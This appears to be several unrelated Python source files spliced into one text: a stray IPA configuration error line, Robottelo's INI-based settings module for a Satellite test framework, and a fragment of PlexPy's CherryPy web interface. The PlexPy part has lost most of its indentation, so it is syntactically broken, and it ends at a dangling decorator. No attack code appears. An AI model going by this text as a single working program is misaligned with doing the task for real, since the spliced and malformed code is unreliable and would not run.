        raise IPAConfigError("IPA domain not found in the config file (/etc/ipa/default.conf) or on the command line.")
|
"""Define and instantiate the configuration class for Robottelo."""
import logging
import os
import sys
from logging import config
from nailgun import entities, entity_mixins
from nailgun.config import ServerConfig
from robottelo.config import casts
from six.moves.urllib.parse import urlunsplit, urljoin
from six.moves.configparser import (
NoOptionError,
NoSectionError,
ConfigParser
)
# Logger shared by this configuration module.
LOGGER = logging.getLogger(__name__)
# Name of the INI file holding Robottelo's settings.
SETTINGS_FILE_NAME = 'robottelo.properties'
class ImproperlyConfigured(Exception):
    """Raised when Robottelo's configuration is invalid or incomplete.

    Typical causes: the settings file cannot be located, or a required
    option is left undefined.
    """
def get_project_root():
    """Return the path to the Robottelo project root directory.

    :return: A directory path (two levels above this module's directory,
        resolved to a real absolute path).
    :rtype: str
    """
    here = os.path.dirname(__file__)
    return os.path.realpath(os.path.join(here, os.pardir, os.pardir))
class INIReader(object):
    """ConfigParser wrapper able to cast value when reading INI options."""

    # Helper casters
    cast_boolean = casts.Boolean()
    cast_dict = casts.Dict()
    cast_list = casts.List()
    cast_logging_level = casts.LoggingLevel()
    cast_tuple = casts.Tuple()
    cast_webdriver_desired_capabilities = casts.WebdriverDesiredCapabilities()

    def __init__(self, path):
        """Parse the INI file at *path* into self.config_parser."""
        self.config_parser = ConfigParser()
        with open(path) as handler:
            # BUG FIX: the file was previously read unconditionally with
            # readfp() *before* this version check, leaving the handle
            # exhausted so the branch below was a no-op (and readfp is
            # deprecated on Python 3). Now the file is read exactly once.
            if sys.version_info[0] < 3:
                self.config_parser.readfp(handler)
            else:
                # ConfigParser.readfp is deprecated on Python3, read_file
                # replaces it
                self.config_parser.read_file(handler)

    def get(self, section, option, default=None, cast=None):
        """Read an option from a section of a INI file.

        The default value will return if the look up option is not available.
        The value will be cast using a callable if specified otherwise a string
        will be returned.

        :param section: Section to look for.
        :param option: Option to look for.
        :param default: The value that should be used if the option is not
            defined.
        :param cast: If provided the value will be cast using the cast
            provided.
        """
        try:
            value = self.config_parser.get(section, option)
            if cast is not None:
                # The builtin types get the project's dedicated casters;
                # anything else is applied directly.
                if cast is bool:
                    value = self.cast_boolean(value)
                elif cast is dict:
                    value = self.cast_dict(value)
                elif cast is list:
                    value = self.cast_list(value)
                elif cast is tuple:
                    value = self.cast_tuple(value)
                else:
                    value = cast(value)
        except (NoSectionError, NoOptionError):
            value = default
        return value

    def has_section(self, section):
        """Check if section is available."""
        return self.config_parser.has_section(section)
class FeatureSettings(object):
    """Abstract base for one feature's settings.

    Subclasses map INI options onto instance attributes and must override
    both ``read`` and ``validate``.
    """

    def read(self, reader):
        """Populate this object from *reader* (an INIReader instance)."""
        raise NotImplementedError('Subclasses must implement read method.')

    def validate(self):
        """Return a list of problems; raise ``ImproperlyConfigured`` usage
        is reported by callers when the list is non-empty."""
        raise NotImplementedError('Subclasses must implement validate method.')
class ServerSettings(FeatureSettings):
    """Satellite server settings definitions."""

    def __init__(self, *args, **kwargs):
        super(ServerSettings, self).__init__(*args, **kwargs)
        # Connection and credential fields, all filled in by read().
        self.admin_password = None
        self.admin_username = None
        self.hostname = None
        self.port = None
        self.scheme = None
        self.ssh_key = None
        self.ssh_password = None
        self.ssh_username = None

    def read(self, reader):
        """Read and validate Satellite server settings."""
        self.admin_password = reader.get(
            'server', 'admin_password', 'changeme')
        self.admin_username = reader.get(
            'server', 'admin_username', 'admin')
        self.hostname = reader.get('server', 'hostname')
        self.port = reader.get('server', 'port', cast=int)
        self.scheme = reader.get('server', 'scheme', 'https')
        self.ssh_key = reader.get('server', 'ssh_key')
        self.ssh_password = reader.get('server', 'ssh_password')
        self.ssh_username = reader.get('server', 'ssh_username', 'root')

    def validate(self):
        """Return a list of error strings for missing required options."""
        errors = []
        if self.hostname is None:
            errors.append('[server] hostname must be provided.')
        if self.ssh_key is None and self.ssh_password is None:
            errors.append(
                '[server] ssh_key or ssh_password must be provided.')
        return errors

    def get_credentials(self):
        """Return credentials for interacting with a Foreman deployment API.

        :return: A username-password pair.
        :rtype: tuple
        """
        return (self.admin_username, self.admin_password)

    def get_url(self):
        """Return the base URL of the Foreman deployment being tested.

        Built from ``[server] scheme`` (default https), ``hostname``
        (required) and ``port`` (optional). Setting ``port`` to 80 does
        *not* change the default scheme.

        :return: A URL.
        :rtype: str
        """
        scheme = self.scheme if self.scheme else 'https'
        netloc = self.hostname
        if self.port:
            netloc = '{0}:{1}'.format(self.hostname, self.port)
        return urlunsplit((scheme, netloc, '', '', ''))

    def get_pub_url(self):
        """Return the pub URL of the server being tested.

        :return: The pub directory URL (always plain http).
        :rtype: str
        """
        return urlunsplit(('http', self.hostname, 'pub/', '', ''))

    def get_cert_rpm_url(self):
        """Return the Katello cert RPM URL of the server being tested.

        :return: The Katello cert RPM URL under the pub directory.
        :rtype: str
        """
        return urljoin(
            self.get_pub_url(), 'katello-ca-consumer-latest.noarch.rpm')
class ClientsSettings(FeatureSettings):
    """Clients settings definitions."""

    def __init__(self, *args, **kwargs):
        super(ClientsSettings, self).__init__(*args, **kwargs)
        self.image_dir = None
        self.provisioning_server = None

    def read(self, reader):
        """Read clients settings."""
        self.image_dir = reader.get(
            'clients', 'image_dir', '/opt/robottelo/images')
        self.provisioning_server = reader.get(
            'clients', 'provisioning_server')

    def validate(self):
        """Validate clients settings."""
        if self.provisioning_server is None:
            return ['[clients] provisioning_server option must be provided.']
        return []
class DockerSettings(FeatureSettings):
    """Docker settings definitions."""

    def __init__(self, *args, **kwargs):
        super(DockerSettings, self).__init__(*args, **kwargs)
        self.unix_socket = None
        self.external_url = None
        self.external_registry_1 = None
        self.external_registry_2 = None

    def read(self, reader):
        """Read docker settings."""
        self.unix_socket = reader.get('docker', 'unix_socket', False, bool)
        self.external_url = reader.get('docker', 'external_url')
        self.external_registry_1 = reader.get('docker', 'external_registry_1')
        self.external_registry_2 = reader.get('docker', 'external_registry_2')

    def validate(self):
        """Validate docker settings."""
        errors = []
        # A daemon endpoint (socket or external URL) is mandatory.
        if not (self.unix_socket or self.external_url):
            errors.append(
                'Either [docker] unix_socket or external_url options must '
                'be provided or enabled.')
        # Both external registries are required together.
        if not (self.external_registry_1 and self.external_registry_2):
            errors.append(
                'Both [docker] external_registry_1 and external_registry_2 '
                'options must be provided.')
        return errors

    def get_unix_socket_url(self):
        """Return the local docker daemon socket URL, or None.

        Only meaningful when ``unix_socket`` is enabled. Make sure the
        Satellite server's docker daemon allows the foreman user access::

            $ groupadd docker
            $ usermod -aG docker foreman
            # Add -G docker to the options for the docker daemon
            $ systemctl restart docker
            $ katello-service restart
        """
        if not self.unix_socket:
            return None
        return 'unix:///var/run/docker.sock'
class FakeManifestSettings(FeatureSettings):
    """Fake manifest settings definitions."""

    # Every option in the [fake_manifest] section is mandatory.
    _OPTIONS = ('cert_url', 'key_url', 'url')

    def __init__(self, *args, **kwargs):
        super(FakeManifestSettings, self).__init__(*args, **kwargs)
        for option in self._OPTIONS:
            setattr(self, option, None)

    def read(self, reader):
        """Read fake manifest settings."""
        for option in self._OPTIONS:
            setattr(self, option, reader.get('fake_manifest', option))

    def validate(self):
        """Validate fake manifest settings.

        :return: list of error messages, empty when the section is valid.
        """
        if all(vars(self).values()):
            return []
        return [
            'All [fake_manifest] cert_url, key_url, url options must '
            'be provided.'
        ]
class LDAPSettings(FeatureSettings):
    """LDAP settings definitions."""

    # Every option in the [ldap] section is mandatory.
    _OPTIONS = ('basedn', 'grpbasedn', 'hostname', 'password', 'username')

    def __init__(self, *args, **kwargs):
        super(LDAPSettings, self).__init__(*args, **kwargs)
        for option in self._OPTIONS:
            setattr(self, option, None)

    def read(self, reader):
        """Read LDAP settings."""
        for option in self._OPTIONS:
            setattr(self, option, reader.get('ldap', option))

    def validate(self):
        """Validate LDAP settings.

        :return: list of error messages, empty when the section is valid.
        """
        if all(vars(self).values()):
            return []
        return [
            'All [ldap] basedn, grpbasedn, hostname, password, '
            'username options must be provided.'
        ]
class LibvirtHostSettings(FeatureSettings):
    """Libvirt host settings definitions."""

    def __init__(self, *args, **kwargs):
        super(LibvirtHostSettings, self).__init__(*args, **kwargs)
        self.libvirt_image_dir = None
        self.libvirt_hostname = None

    def read(self, reader):
        """Read libvirt host settings."""
        self.libvirt_hostname = reader.get(
            'compute_resources', 'libvirt_hostname')
        # Default libvirt storage location used when the option is absent.
        self.libvirt_image_dir = reader.get(
            'compute_resources', 'libvirt_image_dir',
            '/var/lib/libvirt/images')

    def validate(self):
        """Validate libvirt host settings.

        :return: list of error messages, empty when the section is valid.
        """
        if self.libvirt_hostname is None:
            return [
                '[compute_resources] libvirt_hostname option must be '
                'provided.'
            ]
        return []
class FakeCapsuleSettings(FeatureSettings):
    """Fake Capsule settings definitions."""

    def __init__(self, *args, **kwargs):
        super(FakeCapsuleSettings, self).__init__(*args, **kwargs)
        self.port_range = None

    def read(self, reader):
        """Read fake capsule settings."""
        self.port_range = reader.get(
            'fake_capsules', 'port_range', cast=tuple)

    def validate(self):
        """Validate fake capsule settings.

        :return: list of error messages, empty when the section is valid.
        """
        if self.port_range is None:
            return ['[fake_capsules] port_range option must be provided.']
        return []
class RHEVSettings(FeatureSettings):
    """RHEV settings definitions."""

    def __init__(self, *args, **kwargs):
        super(RHEVSettings, self).__init__(*args, **kwargs)
        # Compute Resource Information
        self.hostname = None
        self.username = None
        self.password = None
        self.datacenter = None
        self.vm_name = None
        # Image Information
        self.image_os = None
        self.image_arch = None
        self.image_username = None
        self.image_password = None
        self.image_name = None

    def read(self, reader):
        """Read rhev settings."""
        # Compute Resource Information
        self.hostname = reader.get('rhev', 'hostname')
        self.username = reader.get('rhev', 'username')
        self.password = reader.get('rhev', 'password')
        self.datacenter = reader.get('rhev', 'datacenter')
        self.vm_name = reader.get('rhev', 'vm_name')
        # Image Information
        self.image_os = reader.get('rhev', 'image_os')
        self.image_arch = reader.get('rhev', 'image_arch')
        self.image_username = reader.get('rhev', 'image_username')
        self.image_password = reader.get('rhev', 'image_password')
        self.image_name = reader.get('rhev', 'image_name')

    def validate(self):
        """Validate rhev settings.

        Every option in the [rhev] section is mandatory.

        :return: list of error messages, empty when the section is valid.
        """
        validation_errors = []
        if not all(vars(self).values()):
            # Fixed message: it previously misspelled "image_username",
            # listed image_name twice and omitted image_password.
            validation_errors.append(
                'All [rhev] hostname, username, password, datacenter, '
                'vm_name, image_os, image_arch, image_username, '
                'image_password, image_name options must be provided.'
            )
        return validation_errors
class VmWareSettings(FeatureSettings):
    """VmWare settings definitions."""

    def __init__(self, *args, **kwargs):
        super(VmWareSettings, self).__init__(*args, **kwargs)
        # Compute Resource Information
        self.vcenter = None
        self.username = None
        self.password = None
        self.datacenter = None
        self.vm_name = None
        # Image Information
        self.image_os = None
        self.image_arch = None
        self.image_username = None
        self.image_password = None
        self.image_name = None

    def read(self, reader):
        """Read vmware settings."""
        # Compute Resource Information
        # NOTE: the config option is named ``hostname`` even though the
        # attribute is ``vcenter``.
        self.vcenter = reader.get('vmware', 'hostname')
        self.username = reader.get('vmware', 'username')
        self.password = reader.get('vmware', 'password')
        self.datacenter = reader.get('vmware', 'datacenter')
        self.vm_name = reader.get('vmware', 'vm_name')
        # Image Information
        self.image_os = reader.get('vmware', 'image_os')
        self.image_arch = reader.get('vmware', 'image_arch')
        self.image_username = reader.get('vmware', 'image_username')
        self.image_password = reader.get('vmware', 'image_password')
        self.image_name = reader.get('vmware', 'image_name')

    def validate(self):
        """Validate vmware settings.

        Every option in the [vmware] section is mandatory.

        :return: list of error messages, empty when the section is valid.
        """
        validation_errors = []
        if not all(vars(self).values()):
            # Fixed message: it previously misspelled "image_username",
            # listed image_name twice and omitted image_password.
            validation_errors.append(
                'All [vmware] hostname, username, password, datacenter, '
                'vm_name, image_os, image_arch, image_username, '
                'image_password, image_name options must be provided.'
            )
        return validation_errors
class DiscoveryISOSettings(FeatureSettings):
    """Discovery ISO name settings definition."""

    def __init__(self, *args, **kwargs):
        super(DiscoveryISOSettings, self).__init__(*args, **kwargs)
        self.discovery_iso = None

    def read(self, reader):
        """Read the discovery ISO setting."""
        self.discovery_iso = reader.get('discovery', 'discovery_iso')

    def validate(self):
        """Validate the discovery ISO name setting.

        :return: list of error messages, empty when the section is valid.
        """
        if self.discovery_iso is None:
            return ['[discovery] discovery iso name must be provided.']
        return []
class OscapSettings(FeatureSettings):
    """Oscap settings definitions."""

    def __init__(self, *args, **kwargs):
        super(OscapSettings, self).__init__(*args, **kwargs)
        self.content_path = None

    def read(self, reader):
        """Read Oscap settings."""
        self.content_path = reader.get('oscap', 'content_path')

    def validate(self):
        """Validate Oscap settings.

        :return: list of error messages, empty when the section is valid.
        """
        if self.content_path is None:
            return ['[oscap] content_path option must be provided.']
        return []
class PerformanceSettings(FeatureSettings):
    """Performance settings definitions."""

    # Options that must be present for the section to validate.
    _REQUIRED = (
        'cdn_address',
        'virtual_machines',
        'fresh_install_savepoint',
        'enabled_repos_savepoint',
    )

    def __init__(self, *args, **kwargs):
        super(PerformanceSettings, self).__init__(*args, **kwargs)
        self.time_hammer = None
        self.cdn_address = None
        self.virtual_machines = None
        self.fresh_install_savepoint = None
        self.enabled_repos_savepoint = None
        self.csv_buckets_count = None
        self.sync_count = None
        self.sync_type = None
        self.repos = None

    def read(self, reader):
        """Read performance settings."""
        get = reader.get
        self.time_hammer = get('performance', 'time_hammer', False, bool)
        self.cdn_address = get('performance', 'cdn_address')
        self.virtual_machines = get(
            'performance', 'virtual_machines', cast=list)
        self.fresh_install_savepoint = get(
            'performance', 'fresh_install_savepoint')
        self.enabled_repos_savepoint = get(
            'performance', 'enabled_repos_savepoint')
        self.csv_buckets_count = get(
            'performance', 'csv_buckets_count', 10, int)
        self.sync_count = get('performance', 'sync_count', 3, int)
        self.sync_type = get('performance', 'sync_type', 'sync')
        self.repos = get('performance', 'repos', cast=list)

    def validate(self):
        """Validate performance settings.

        :return: list of error messages, empty when the section is valid.
        """
        return [
            '[performance] {0} must be provided.'.format(option)
            for option in self._REQUIRED
            if getattr(self, option) is None
        ]
class RHAISettings(FeatureSettings):
    """RHAI settings definitions."""

    def __init__(self, *args, **kwargs):
        super(RHAISettings, self).__init__(*args, **kwargs)
        self.insights_client_el6repo = None
        self.insights_client_el7repo = None

    def read(self, reader):
        """Read RHAI settings."""
        for option in ('insights_client_el6repo', 'insights_client_el7repo'):
            setattr(self, option, reader.get('rhai', option))

    def validate(self):
        """Validate RHAI settings; no option is mandatory."""
        return []
class TransitionSettings(FeatureSettings):
    """Transition settings definitions."""

    def __init__(self, *args, **kwargs):
        super(TransitionSettings, self).__init__(*args, **kwargs)
        self.exported_data = None

    def read(self, reader):
        """Read transition settings."""
        self.exported_data = reader.get('transition', 'exported_data')

    def validate(self):
        """Validate transition settings.

        :return: list of error messages, empty when the section is valid.
        """
        if self.exported_data is None:
            return ['[transition] exported_data must be provided.']
        return []
class VlanNetworkSettings(FeatureSettings):
    """Vlan Network settings definitions."""

    # Every option in the [vlan_networking] section is mandatory.
    _OPTIONS = ('subnet', 'netmask', 'gateway', 'bridge')

    def __init__(self, *args, **kwargs):
        super(VlanNetworkSettings, self).__init__(*args, **kwargs)
        for option in self._OPTIONS:
            setattr(self, option, None)

    def read(self, reader):
        """Read Vlan Network settings."""
        for option in self._OPTIONS:
            setattr(self, option, reader.get('vlan_networking', option))

    def validate(self):
        """Validate Vlan Network settings.

        :return: list of error messages, empty when the section is valid.
        """
        if all(vars(self).values()):
            return []
        return [
            'All [vlan_networking] subnet, netmask, gateway, bridge '
            'options must be provided.'
        ]
class UpgradeSettings(FeatureSettings):
    """Satellite upgrade settings definitions."""

    def __init__(self, *args, **kwargs):
        super(UpgradeSettings, self).__init__(*args, **kwargs)
        self.upgrade_data = None

    def read(self, reader):
        """Read upgrade settings."""
        self.upgrade_data = reader.get('upgrade', 'upgrade_data')

    def validate(self):
        """Validate upgrade settings.

        :return: list of error messages, empty when the section is valid.
        """
        if self.upgrade_data is None:
            return ['[upgrade] data must be provided.']
        return []
class Settings(object):
    """Robottelo's settings representation."""

    # Optional feature sections handled generically by ``configure``.
    # Each name doubles as the attribute name on this class and the
    # section name in the settings file. The mandatory ``server`` section
    # is read unconditionally, so it is not listed here. The order below
    # preserves the order in which sections were previously validated.
    _FEATURE_SECTIONS = (
        'clients',
        'compute_resources',
        'discovery',
        'docker',
        'fake_capsules',
        'fake_manifest',
        'ldap',
        'oscap',
        'performance',
        'rhai',
        'rhev',
        'transition',
        'vlan_networking',
        'upgrade',
        'vmware',
    )

    def __init__(self):
        self._all_features = None
        self._configured = False
        self._validation_errors = []
        self.browser = None
        # Declared here for completeness; previously these three were
        # only created inside _read_robottelo_settings.
        self.cleanup = None
        self.log_driver_commands = None
        self.window_manager_command = None
        self.locale = None
        self.project = None
        self.reader = None
        self.rhel6_repo = None
        self.rhel7_repo = None
        self.screenshots_path = None
        self.saucelabs_key = None
        self.saucelabs_user = None
        self.server = ServerSettings()
        self.run_one_datapoint = None
        self.upstream = None
        self.verbosity = None
        self.webdriver = None
        self.webdriver_binary = None
        self.webdriver_desired_capabilities = None
        # Features
        self.clients = ClientsSettings()
        self.compute_resources = LibvirtHostSettings()
        self.discovery = DiscoveryISOSettings()
        self.docker = DockerSettings()
        self.fake_capsules = FakeCapsuleSettings()
        self.fake_manifest = FakeManifestSettings()
        self.ldap = LDAPSettings()
        self.oscap = OscapSettings()
        self.performance = PerformanceSettings()
        self.rhai = RHAISettings()
        self.rhev = RHEVSettings()
        self.transition = TransitionSettings()
        self.vlan_networking = VlanNetworkSettings()
        self.upgrade = UpgradeSettings()
        self.vmware = VmWareSettings()

    def configure(self):
        """Read the settings file and parse the configuration.

        :raises: ImproperlyConfigured if any issue is found during the parsing
            or validation of the configuration.
        """
        if self.configured:
            # TODO: what to do here, raise and exception, just skip or ...?
            return

        # Expect the settings file to be on the robottelo project root.
        settings_path = os.path.join(get_project_root(), SETTINGS_FILE_NAME)
        if not os.path.isfile(settings_path):
            raise ImproperlyConfigured(
                'Not able to find settings file at {}'.format(settings_path))

        self.reader = INIReader(settings_path)
        self._read_robottelo_settings()
        self._validation_errors.extend(
            self._validate_robottelo_settings())

        # The server section is mandatory; read it unconditionally.
        self.server.read(self.reader)
        self._validation_errors.extend(self.server.validate())

        # Optional feature sections: read and validate each one only when
        # it is present in the settings file. This replaces fifteen
        # copy-pasted if-blocks with one loop.
        for section in self._FEATURE_SECTIONS:
            if self.reader.has_section(section):
                feature = getattr(self, section)
                feature.read(self.reader)
                self._validation_errors.extend(feature.validate())

        if self._validation_errors:
            raise ImproperlyConfigured(
                'Failed to validate the configuration, check the message(s):\n'
                '{}'.format('\n'.join(self._validation_errors))
            )

        self._configure_logging()
        self._configure_third_party_logging()
        self._configure_entities()
        self._configured = True

    def _read_robottelo_settings(self):
        """Read Robottelo's general settings."""
        self.log_driver_commands = self.reader.get(
            'robottelo',
            'log_driver_commands',
            ['newSession',
             'windowMaximize',
             'get',
             'findElement',
             'sendKeysToElement',
             'clickElement',
             'mouseMoveTo'],
            list
        )
        self.browser = self.reader.get(
            'robottelo', 'browser', 'selenium')
        self.locale = self.reader.get('robottelo', 'locale', 'en_US.UTF-8')
        self.project = self.reader.get('robottelo', 'project', 'sat')
        self.rhel6_repo = self.reader.get('robottelo', 'rhel6_repo', None)
        self.rhel7_repo = self.reader.get('robottelo', 'rhel7_repo', None)
        self.screenshots_path = self.reader.get(
            'robottelo', 'screenshots_path', '/tmp/robottelo/screenshots')
        self.run_one_datapoint = self.reader.get(
            'robottelo', 'run_one_datapoint', False, bool)
        self.cleanup = self.reader.get('robottelo', 'cleanup', False, bool)
        self.upstream = self.reader.get('robottelo', 'upstream', True, bool)
        self.verbosity = self.reader.get(
            'robottelo',
            'verbosity',
            INIReader.cast_logging_level('debug'),
            INIReader.cast_logging_level
        )
        self.webdriver = self.reader.get(
            'robottelo', 'webdriver', 'firefox')
        self.saucelabs_user = self.reader.get(
            'robottelo', 'saucelabs_user', None)
        self.saucelabs_key = self.reader.get(
            'robottelo', 'saucelabs_key', None)
        self.webdriver_binary = self.reader.get(
            'robottelo', 'webdriver_binary', None)
        self.webdriver_desired_capabilities = self.reader.get(
            'robottelo',
            'webdriver_desired_capabilities',
            None,
            cast=INIReader.cast_webdriver_desired_capabilities
        )
        self.window_manager_command = self.reader.get(
            'robottelo', 'window_manager_command', None)

    def _validate_robottelo_settings(self):
        """Validate Robottelo's general settings.

        :return: list of error messages, empty when everything is valid.
        """
        validation_errors = []
        browsers = ('selenium', 'docker', 'saucelabs')
        webdrivers = ('chrome', 'firefox', 'ie', 'phantomjs', 'remote')
        if self.browser not in browsers:
            validation_errors.append(
                '[robottelo] browser should be one of {0}.'
                .format(', '.join(browsers))
            )
        if self.webdriver not in webdrivers:
            validation_errors.append(
                '[robottelo] webdriver should be one of {0}.'
                .format(', '.join(webdrivers))
            )
        if self.browser == 'saucelabs':
            # Both saucelabs credentials are required for that browser.
            if self.saucelabs_user is None:
                validation_errors.append(
                    '[robottelo] saucelabs_user must be provided when '
                    'browser is saucelabs.'
                )
            if self.saucelabs_key is None:
                validation_errors.append(
                    '[robottelo] saucelabs_key must be provided when '
                    'browser is saucelabs.'
                )
        return validation_errors

    @property
    def configured(self):
        """Returns True if the settings have already been configured."""
        return self._configured

    @property
    def all_features(self):
        """List all expected feature settings sections."""
        if self._all_features is None:
            self._all_features = [
                name for name, value in vars(self).items()
                if isinstance(value, FeatureSettings)
            ]
        return self._all_features

    def _configure_entities(self):
        """Configure NailGun's entity classes.

        Do the following:

        * Set ``entity_mixins.CREATE_MISSING`` to ``True``. This causes method
          ``EntityCreateMixin.create_raw`` to generate values for empty and
          required fields.
        * Set ``nailgun.entity_mixins.DEFAULT_SERVER_CONFIG`` to whatever is
          returned by :meth:`robottelo.helpers.get_nailgun_config`. See
          ``robottelo.entity_mixins.Entity`` for more information on the
          effects of this.
        * Set a default value for ``nailgun.entities.GPGKey.content``.
        * Set the default value for
          ``nailgun.entities.DockerComputeResource.url``
          if either ``docker.internal_url`` or ``docker.external_url`` is set
          in the configuration file.
        """
        entity_mixins.CREATE_MISSING = True
        entity_mixins.DEFAULT_SERVER_CONFIG = ServerConfig(
            self.server.get_url(),
            self.server.get_credentials(),
            verify=False,
        )

        gpgkey_init = entities.GPGKey.__init__

        def patched_gpgkey_init(self, server_config=None, **kwargs):
            """Set a default value on the ``content`` field."""
            gpgkey_init(self, server_config, **kwargs)
            self._fields['content'].default = os.path.join(
                get_project_root(),
                'tests', 'foreman', 'data', 'valid_gpg_key.txt'
            )
        entities.GPGKey.__init__ = patched_gpgkey_init

        # NailGun provides a default value for ComputeResource.url. We override
        # that value if `docker.internal_url` or `docker.external_url` is set.
        docker_url = None
        # Try getting internal url
        docker_url = self.docker.get_unix_socket_url()
        # Try getting external url
        if docker_url is None:
            docker_url = self.docker.external_url
        if docker_url is not None:
            dockercr_init = entities.DockerComputeResource.__init__

            def patched_dockercr_init(self, server_config=None, **kwargs):
                """Set a default value on the ``docker_url`` field."""
                dockercr_init(self, server_config, **kwargs)
                self._fields['url'].default = docker_url
            entities.DockerComputeResource.__init__ = patched_dockercr_init

    def _configure_logging(self):
        """Configure logging for the entire framework.

        If a config named ``logging.conf`` exists in Robottelo's root
        directory, the logger is configured using the options in that file.
        Otherwise, a custom logging output format is set, and default values
        are used for all other logging options.
        """
        # All output should be made by the logging module, including warnings
        logging.captureWarnings(True)

        # Set the logging level based on the Robottelo's verbosity
        for name in ('nailgun', 'robottelo'):
            logging.getLogger(name).setLevel(self.verbosity)

        # Allow overriding logging config based on the presence of logging.conf
        # file on Robottelo's project root
        logging_conf_path = os.path.join(get_project_root(), 'logging.conf')
        if os.path.isfile(logging_conf_path):
            config.fileConfig(logging_conf_path)
        else:
            logging.basicConfig(
                format='%(levelname)s %(module)s:%(lineno)d: %(message)s'
            )

    def _configure_third_party_logging(self):
        """Increase the level of third party packages logging."""
        loggers = (
            'bugzilla',
            'easyprocess',
            'paramiko',
            'requests.packages.urllib3.connectionpool',
            'selenium.webdriver.remote.remote_connection',
        )
        for logger in loggers:
            logging.getLogger(logger).setLevel(logging.WARNING)
|
# This file is part of PlexPy.
from plexpy import logger, notifiers, plextv, pmsconnect, common, log_reader, datafactory, graphs, users
from plexpy.helpers import checked, radio
from mako.lookup import TemplateLookup
from mako import exceptions
import plexpy
import threading
import cherrypy
import hashlib
import random
import json
import os
try:
# pylint:disable=E0611
# ignore this error because we are catching the ImportError
from collections import OrderedDict
# pylint:enable=E0611
except ImportError:
# Python 2.6.x fallback, from libs
from ordereddict import OrderedDict
def serve_template(templatename, **kwargs):
    """Render the named Mako template from the configured interface dir.

    :param templatename: file name of the template to render.
    :param kwargs: context variables passed through to the template.
    :return: the rendered page, or Mako's HTML error page when rendering
        fails.
    """
    interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/interfaces/')
    template_dir = os.path.join(str(interface_dir), plexpy.CONFIG.INTERFACE)

    _hplookup = TemplateLookup(directories=[template_dir])

    try:
        template = _hplookup.get_template(templatename)
        return template.render(**kwargs)
    except Exception:
        # Narrowed from a bare ``except:`` so SystemExit and
        # KeyboardInterrupt are no longer swallowed; template errors are
        # still reported via Mako's error page.
        return exceptions.html_error_template().render()
class WebInterface(object):
def __init__(self):
self.interface_dir = os.path.join(str(plexpy.PROG_DIR), 'data/')
@cherrypy.expose
def index(self):
if plexpy.CONFIG.FIRST_RUN_COMPLETE:
raise cherrypy.HTTPRedirect("home")
else:
raise cherrypy.HTTPRedirect("welcome")
@cherrypy.expose
def home(self):
config = {
"home_stats_length": plexpy.CONFIG.HOME_STATS_LENGTH,
"home_stats_type": plexpy.CONFIG.HOME_STATS_TYPE,
"home_stats_count": plexpy.CONFIG.HOME_STATS_COUNT,
"pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
}
return serve_template(templatename="index.html", title="Home", config=config)
    @cherrypy.expose
    def welcome(self, **kwargs):
        """Render the first-run setup wizard, or redirect home once set up.

        NOTE(review): the config dict appears to mirror the form fields of
        welcome.html; ``checked`` presumably converts truthy flags into the
        value the template expects for checkbox state — confirm in
        plexpy.helpers.
        """
        config = {
            "launch_browser": checked(plexpy.CONFIG.LAUNCH_BROWSER),
            "refresh_users_on_startup": checked(plexpy.CONFIG.REFRESH_USERS_ON_STARTUP),
            "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER,
            "pms_ip": plexpy.CONFIG.PMS_IP,
            "pms_is_remote": checked(plexpy.CONFIG.PMS_IS_REMOTE),
            "pms_port": plexpy.CONFIG.PMS_PORT,
            "pms_token": plexpy.CONFIG.PMS_TOKEN,
            "pms_ssl": checked(plexpy.CONFIG.PMS_SSL),
            "pms_uuid": plexpy.CONFIG.PMS_UUID,
            "tv_notify_enable": checked(plexpy.CONFIG.TV_NOTIFY_ENABLE),
            "movie_notify_enable": checked(plexpy.CONFIG.MOVIE_NOTIFY_ENABLE),
            "music_notify_enable": checked(plexpy.CONFIG.MUSIC_NOTIFY_ENABLE),
            "tv_notify_on_start": checked(plexpy.CONFIG.TV_NOTIFY_ON_START),
            "movie_notify_on_start": checked(plexpy.CONFIG.MOVIE_NOTIFY_ON_START),
            "music_notify_on_start": checked(plexpy.CONFIG.MUSIC_NOTIFY_ON_START),
            "video_logging_enable": checked(plexpy.CONFIG.VIDEO_LOGGING_ENABLE),
            "music_logging_enable": checked(plexpy.CONFIG.MUSIC_LOGGING_ENABLE),
            "logging_ignore_interval": plexpy.CONFIG.LOGGING_IGNORE_INTERVAL,
            "check_github": checked(plexpy.CONFIG.CHECK_GITHUB)
        }

        # The setup wizard just refreshes the page on submit so we must redirect to home if config set.
        # Also redirecting to home if a PMS token already exists - will remove this in future.
        if plexpy.CONFIG.FIRST_RUN_COMPLETE or plexpy.CONFIG.PMS_TOKEN:
            raise cherrypy.HTTPRedirect("home")
        else:
            return serve_template(templatename="welcome.html", title="Welcome", config=config)
@cherrypy.expose
def get_date_formats(self):
if plexpy.CONFIG.DATE_FORMAT:
date_format = plexpy.CONFIG.DATE_FORMAT
else:
date_format = 'YYYY-MM-DD'
if plexpy.CONFIG.TIME_FORMAT:
time_format = plexpy.CONFIG.TIME_FORMAT
else:
time_format = 'HH:mm'
formats = {'date_format': date_format,
'time_format': time_format}
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(formats)
@cherrypy.expose
def home_stats(self, time_range='30', stat_type='0', stat_count='5', **kwargs):
data_factory = datafactory.DataFactory()
stats_data = data_factory.get_home_stats(time_range=time_range, stat_type=stat_type, stat_count=stat_count)
return serve_template(templatename="home_stats.html", title="Stats", data=stats_data)
@cherrypy.expose
def library_stats(self, **kwargs):
pms_connect = pmsconnect.PmsConnect()
stats_data = pms_connect.get_library_stats()
return serve_template(templatename="library_stats.html", title="Library Stats", data=stats_data)
    @cherrypy.expose
    def history(self):
        """Render the watch history page."""
        return serve_template(templatename="history.html", title="History")
    @cherrypy.expose
    def users(self):
        """Render the users overview page."""
        return serve_template(templatename="users.html", title="Users")
    @cherrypy.expose
    def graphs(self):
        """Render the graphs page."""
        return serve_template(templatename="graphs.html", title="Graphs")
    @cherrypy.expose
    def sync(self):
        """Render the synced items page."""
        return serve_template(templatename="sync.html", title="Synced Items")
@cherrypy.expose
def user(self, user=None, user_id=None):
user_data = users.Users()
if user_id:
try:
user_details = user_data.get_user_details(user_id=user_id)
except:
logger.warn("Unable to retrieve friendly name for user_id %s " % user_id)
elif user:
try:
user_details = user_data.get_user_details(user=user)
except:
logger.warn("Unable to retrieve friendly name for user %s " % user)
else:
logger.debug(u"User page requested but no parameters received.")
raise cherrypy.HTTPRedirect("home")
return serve_template(templatename="user.html", title="User", data=user_details)
@cherrypy.expose
